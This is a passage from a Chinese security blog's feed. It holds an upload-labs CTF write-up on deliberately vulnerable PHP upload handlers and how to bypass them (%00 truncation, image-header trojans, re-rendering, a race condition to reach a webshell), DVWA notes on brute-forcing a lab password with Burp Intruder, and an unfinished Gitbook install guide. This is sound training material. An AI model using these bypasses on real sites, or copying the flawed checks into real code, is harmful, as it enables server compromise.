class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br></pre></td></tr></table></figure><p>因此可以利用%00截断绕过:</p><ul><li>需关闭magic_quotes_gpc</li><li>php 版本<5.3.4</li></ul><h2 id="第12关-POST型00截断"><a href="#第12关-POST型00截断" class="headerlink" title="第12关 POST型00截断"></a>第12关 POST型00截断</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_ext = substr($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],strrpos($_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>],<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $img_path = $_POST[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传失败"</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>save_path是通过post传进来的:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$img_path = $_POST[<span class="string">'save_path'</span>].<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br></pre></td></tr></table></figure><p>还是利用00截断,但这次需要在二进制中进行修改,因为post不会像get对%00进行自动解码。</p><h2 id="第13关-图马"><a href="#第13关-图马" class="headerlink" title="第13关 图马"></a>第13关 图马</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line"> $bin = fread($file, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line"> fclose($file);</span><br><span class="line"> $strInfo = @unpack(<span class="string">"C2chars"</span>, $bin); </span><br><span class="line"> $typeCode = intval($strInfo[<span class="string">'chars1'</span>].$strInfo[<span class="string">'chars2'</span>]); </span><br><span class="line"> $fileType = <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">switch</span>($typeCode){ </span><br><span class="line"> <span class="keyword">case</span> <span class="number">255216</span>: </span><br><span class="line"> $fileType = <span class="string">'jpg'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">13780</span>: </span><br><span class="line"> $fileType = <span class="string">'png'</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">case</span> <span class="number">7173</span>: </span><br><span class="line"> $fileType = <span class="string">'gif'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: </span><br><span class="line"> $fileType = <span class="string">'unknown'</span>;</span><br><span class="line"> } </span><br><span class="line"> <span class="keyword">return</span> $fileType;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $file_type = getReailFileType($temp_file);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($file_type == <span class="string">'unknown'</span>){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_type;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>getReailFileType函数只会读取文件的前两个字节:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$file = fopen($filename, <span class="string">"rb"</span>);</span><br><span class="line">$bin = fread($file, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br></pre></td></tr></table></figure><p>所以我们伪造一个文件头即可,使用图马可以轻松绕过。利用的话,还需要结合文件包含漏洞。</p><h2 id="第14关-getimagesize"><a href="#第14关-getimagesize" class="headerlink" title="第14关 getimagesize"></a>第14关 getimagesize</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>{</span><br><span class="line"> $types = <span class="string">'.jpeg|.png|.gif'</span>;</span><br><span class="line"> <span class="keyword">if</span>(file_exists($filename)){</span><br><span class="line"> $info = getimagesize($filename);</span><br><span class="line"> $ext = image_type_to_extension($info[<span class="number">2</span>]);</span><br><span class="line"> <span class="keyword">if</span>(stripos($types,$ext)>=<span class="number">0</span>){</span><br><span class="line"> <span class="keyword">return</span> $ext;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> <span class="keyword">if</span>(!$res){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).$res;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>校验了文件头:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$info = getimagesize($filename);</span><br></pre></td></tr></table></figure><p>利用图片马就可进行绕过</p><h2 id="第15关-exif-imagetype"><a href="#第15关-exif-imagetype" class="headerlink" title="第15关 exif_imagetype"></a>第15关 exif_imagetype</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span><span class="params">($filename)</span></span>{</span><br><span class="line"> <span class="comment">//需要开启php_exif模块</span></span><br><span class="line"> $image_type = exif_imagetype($filename);</span><br><span class="line"> <span class="keyword">switch</span> ($image_type) {</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_GIF:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"gif"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_JPEG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"jpg"</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> IMAGETYPE_PNG:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"png"</span>;</span><br><span class="line"> <span class="keyword">break</span>; </span><br><span class="line"> <span class="keyword">default</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $res = isImage($temp_file);</span><br><span class="line"> <span class="keyword">if</span>(!$res){</span><br><span class="line"> $msg = <span class="string">"文件未知,上传失败!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">"/"</span>.rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$res;</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file,$img_path)){</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>php_exif模块来判断文件类型,还是直接就可以利用图片马就可进行绕过:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$image_type = exif_imagetype($filename);</span><br></pre></td></tr></table></figure><h2 id="第16关-二次渲染绕过"><a href="#第16关-二次渲染绕过" class="headerlink" title="第16关 二次渲染绕过"></a>第16关 二次渲染绕过</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> <span class="comment">// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径</span></span><br><span class="line"> $filename = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $filetype = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'type'</span>];</span><br><span class="line"> $tmpname = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"></span><br><span class="line"> $target_path=UPLOAD_PATH.<span class="string">'/'</span>.basename($filename);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 获得上传文件的扩展名</span></span><br><span class="line"> $fileext= substr(strrchr($filename,<span class="string">"."</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">//判断文件后缀与类型,合法才进行上传操作</span></span><br><span class="line"> <span class="keyword">if</span>(($fileext == <span class="string">"jpg"</span>) && ($filetype==<span class="string">"image/jpeg"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($tmpname,$target_path)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> $im = imagecreatefromjpeg($target_path);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($im == <span class="keyword">false</span>){</span><br><span class="line"> $msg = <span class="string">"该文件不是jpg格式的图片!"</span>;</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> $newfilename = strval(rand()).<span class="string">".jpg"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$newfilename;</span><br><span class="line"> imagejpeg($im,$img_path);</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>(($fileext == <span class="string">"png"</span>) && ($filetype==<span class="string">"image/png"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($tmpname,$target_path)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> $im = imagecreatefrompng($target_path);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>($im == <span class="keyword">false</span>){</span><br><span class="line"> $msg = <span class="string">"该文件不是png格式的图片!"</span>;</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> $newfilename = strval(rand()).<span class="string">".png"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$newfilename;</span><br><span class="line"> imagepng($im,$img_path);</span><br><span class="line"></span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>; </span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }<span class="keyword">else</span> <span class="keyword">if</span>(($fileext == <span class="string">"gif"</span>) && ($filetype==<span class="string">"image/gif"</span>)){</span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($tmpname,$target_path)){</span><br><span class="line"> <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line"> $im = imagecreatefromgif($target_path);</span><br><span class="line"> <span class="keyword">if</span>($im == <span class="keyword">false</span>){</span><br><span class="line"> $msg = <span class="string">"该文件不是gif格式的图片!"</span>;</span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//给新图片指定文件名</span></span><br><span class="line"> srand(time());</span><br><span class="line"> $newfilename = strval(rand()).<span class="string">".gif"</span>;</span><br><span class="line"> <span class="comment">//显示二次渲染后的图片(使用用户上传图片生成的新图片)</span></span><br><span class="line"> $img_path = UPLOAD_PATH.<span class="string">'/'</span>.$newfilename;</span><br><span class="line"> imagegif($im,$img_path);</span><br><span class="line"></span><br><span class="line"> @unlink($target_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $msg = <span class="string">"上传出错!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传后缀为.jpg|.png|.gif的图片文件!"</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>本关综合判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染.</p><p><a href="https://yang1k.github.io/2018/08/30/upload-pass16/" target="_blank" rel="noopener">https://yang1k.github.io/2018/08/30/upload-pass16/</a></p><h2 id="第17关-条件竞争"><a href="#第17关-条件竞争" class="headerlink" title="第17关 条件竞争"></a>第17关 条件竞争</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$is_upload = <span class="keyword">false</span>;</span><br><span class="line">$msg = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>])){</span><br><span class="line"> $ext_arr = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> $file_name = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'name'</span>];</span><br><span class="line"> $temp_file = $_FILES[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> $file_ext = substr($file_name,strrpos($file_name,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line"> $upload_file = UPLOAD_PATH . <span class="string">'/'</span> . $file_name;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(move_uploaded_file($temp_file, $upload_file)){</span><br><span class="line"> <span class="keyword">if</span>(in_array($file_ext,$ext_arr)){</span><br><span class="line"> $img_path = UPLOAD_PATH . <span class="string">'/'</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line"> rename($upload_file, $img_path);</span><br><span class="line"> $is_upload = <span class="keyword">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">"只允许上传.jpg|.png|.gif类型文件!"</span>;</span><br><span class="line"> unlink($upload_file);</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> $msg = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>利用条件竞争删除文件时间差绕过。这里先将文件上传到服务器,然后通过rename修改名称:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$upload_file = UPLOAD_PATH . <span class="string">'/'</span> . $file_name;</span><br><span class="line">$img_path = UPLOAD_PATH . <span class="string">'/'</span>. rand(<span class="number">10</span>, <span class="number">99</span>).date(<span class="string">"YmdHis"</span>).<span class="string">"."</span>.$file_ext;</span><br><span class="line">rename($upload_file, $img_path);</span><br></pre></td></tr></table></figure><p>再通过unlink删除文件:</p><figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unlink</span>($upload_file);</span><br></pre></td></tr></table></figure><p>因此可以通过条件竞争的方式在unlink之前,访问webshell。</p>]]></content>
<summary type="html">
<p><img src="https://s1.ax1x.com/2020/05/02/JvJadS.png" alt="JvJadS.png"></p>
<p><img src="https://s1.ax1x.com/2020/05/02/JvJYsP.png" alt="J
</summary>
<category term="CTF" scheme="https://singlemindedt.github.io/tags/CTF/"/>
<category term="Upload" scheme="https://singlemindedt.github.io/tags/Upload/"/>
</entry>
<entry>
<title>DVWA相关记录</title>
<link href="https://singlemindedt.github.io/2020/08/02/DVWA%E7%9B%B8%E5%85%B3%E8%AE%B0%E5%BD%95/"/>
<id>https://singlemindedt.github.io/2020/08/02/DVWA相关记录/</id>
<published>2020-08-02T06:09:37.000Z</published>
<updated>2020-08-02T07:51:48.970Z</updated>
<content type="html"><![CDATA[<p>根目录下对应目录名访问:</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我的:http:<span class="regexp">//</span><span class="number">127.0</span>.<span class="number">0.1</span><span class="regexp">/DVWA-master/</span></span><br></pre></td></tr></table></figure><p>使用<code>admin</code>&<code>password</code>登录;</p><p>例:已知密码为4位数字,爆破密码</p><p>连接:<a href="http://10.20.64.138/brute.php" target="_blank" rel="noopener">http://10.20.64.138/brute.php</a></p><p>get请求,</p><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">pass</span> is <span class="literal">error</span></span><br><span class="line">hint: isset(<span class="variable">$_REQUEST</span>[<span class="string">'pass'</span>])</span><br></pre></td></tr></table></figure><p>访问:</p><p><code>http://10.20.64.138/brute.php?pass=1234</code></p><ul><li><strong>BP拦截,</strong> </li></ul><ul><li><strong>Send to Intruder</strong></li></ul><p>Payload Positions 确定攻击目标</p><ul><li><strong>Payloads</strong></li></ul><p>Payload Sets 模块,设置type为Number;</p><p>随机</p><p>数字特征</p><p>+++</p><p>自定义迭代器</p>]]></content>
<summary type="html">
<p>根目录下对应目录名访问:</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="co
</summary>
<category term="DVWA" scheme="https://singlemindedt.github.io/tags/DVWA/"/>
</entry>
<entry>
<title>Gitbook安装与使用</title>
<link href="https://singlemindedt.github.io/2020/08/01/Gitbook%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8/"/>
<id>https://singlemindedt.github.io/2020/08/01/Gitbook安装与使用/</id>
<published>2020-08-01T04:34:24.000Z</published>
<updated>2020-08-01T05:59:29.508Z</updated>
<content type="html"><![CDATA[<h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h1><ol><li><p>推荐搭配:Git + Gitbook + Typora</p></li><li><p>环境:</p><ul><li>GitBook 是基于 Node.js,所以我们首先需要安装 Node.js(安装 Node.js 都会默认安装 npm(node 包管理工具),所以我们不用单独安装 npm)</li></ul></li><li><p>安装Gitbook</p></li></ol><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">npm install -g gitbook-cli</span><br></pre></td></tr></table></figure><p>等待安装完毕。</p><h1 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h1><p>新建文件夹比如MyGitBook,命令行执行<code>gitbook init</code>;</p><p>+++</p><p><font color="#ff0000" size="5" face="黑体">注意:</font></p><p>可能遇到以下问题:</p><p><img src="https://s1.ax1x.com/2020/08/01/a370BD.png" alt="a370BD.png"></p><p>或</p><p><strong>installing gitbook xxx 时间过长</strong></p><p><font color="#ff0000" size="4" face="黑体">解决方法:</font></p><p>由于安装过程默认使用国外镜像,速度较慢或连接超时,可以将其切换为国内镜像;</p><ul><li>命令行下:<code>npm config set registry=http://registry.npm.taobao.org</code>直接设置镜像</li><li>打开nodejs安装文件夹下面的子目录node_modules\npm\npmrc,添加配置<code>registry=http://registry.npm.taobao.org</code></li></ul><p>+++</p><p><code>Installing GitBook 3.2.3</code>执行完毕后,如下:</p><p><img src="https://s1.ax1x.com/2020/08/01/a37wnO.png" alt="a37wnO.png"></p><p>会在MyGitBook下创建,README.md和SUMMARY.md文件;</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">- GitBook</span><br><span class="line"> - README.md(介绍文件)</span><br><span class="line"> - SUMMARY.md(目录文件)</span><br></pre></td></tr></table></figure><p>+++</p><p>终端输入<code>girbook serve</code>即可开启一个 <code>localhost:4000</code> 的服务,请在浏览器中输入 <code>http://localhost:4000</code> 即可访问服务。</p><p><img src="https://s1.ax1x.com/2020/08/01/a37rAH.png" alt="a37rAH.png"></p><p><img 